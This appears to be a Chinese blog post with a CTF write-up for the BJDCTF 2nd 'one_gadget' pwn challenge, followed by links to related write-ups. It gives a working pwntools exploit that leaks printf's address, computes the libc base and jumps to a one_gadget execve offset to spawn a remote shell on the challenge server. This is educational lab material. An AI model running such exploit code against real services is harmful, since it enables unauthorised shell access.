[BJDCTF 2nd]one_gadget

妖狐艹你老母 2023-02-17 03:55 82阅读 0赞

在这里插入图片描述

在这里插入图片描述

这里主要是用到了这个工具，但是这个工具的原理我还不了解，但是我调试了一下，最主要的是这个工具提供的shell需要满足它下面给的约束条件，对于这个题目而言要利用这个shell的条件就是[rsp + 0x70] == NULL
在这里插入图片描述
exp

from pwn import *
context(log_level = 'debug')
libc = ELF('./libc/libc-2.29.64.so')
p = remote('node3.buuoj.cn', 25656)
p.recvuntil('0x'.encode())
printf_addr = int(p.recvn(12), 16)
printf_offset = libc.sym['printf']
libc_base = printf_addr - printf_offset
execve_offset = 0x106ef8
execve_addr = libc_base + execve_offset
payload = str(execve_addr)
p.sendline(payload)
p.interactive()

在这里插入图片描述

发表评论取消回复

表情：

评论列表（有 0 条评论，82人围观）

还没有评论，来说两句吧...

相关阅读

相关 [BJDCTF 2nd]secret&&inndy_rop

\[BJDCTF 2nd\]secret ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_a

约定不等于承诺〃/ 2023年02月28日 05:22/ 0 赞/ 67 阅读

相关 bjdctf_2020_router

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

太过爱你忘了你带给我的痛/ 2023年02月23日 08:16/ 0 赞/ 55 阅读

相关 bjdctf_2020_babyrop2

![在这里插入图片描述][20200705233227679.png] 注意这题开启了Canary ![在这里插入图片描述][watermark_type_ZmFuZ3p

骑猪看日落/ 2023年02月23日 08:15/ 0 赞/ 110 阅读

相关 bjdctf_2020_babystack2

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

àì夳堔傛蜴生んèń/ 2023年02月21日 12:44/ 0 赞/ 87 阅读

相关 [BJDCTF 2nd]ydsneedgirlfriend2[use after free]

![在这里插入图片描述][20200626171146938.png] 有符号表，而且直接留了后门！ ![在这里插入图片描述][watermark_type_ZmFuZ

分手后的思念是犯贱/ 2023年02月20日 12:09/ 0 赞/ 75 阅读

相关 bjdctf_2020_babyrop

![在这里插入图片描述][20200623221750619.png] exp from pwn import from LibcSearcher im

「爱情、让人受尽委屈。」/ 2023年02月20日 06:28/ 0 赞/ 99 阅读

相关 [BJDCTF 2nd]test

ssh ctf@node3.buuoj.cn -p <port> ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_sh

浅浅的花香味﹌/ 2023年02月20日 04:52/ 0 赞/ 88 阅读

相关 bjdctf_2020_babystack

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

淡淡的烟草味﹌/ 2023年02月17日 11:22/ 0 赞/ 76 阅读

相关 [BJDCTF 2nd]one_gadget

![在这里插入图片描述][2020061211542959.png] ![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shad

妖狐艹你老母/ 2023年02月17日 03:55/ 0 赞/ 83 阅读

相关 [BJDCTF 2nd]r2t3

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ub

梦里梦外;/ 2023年02月17日 02:37/ 0 赞/ 78 阅读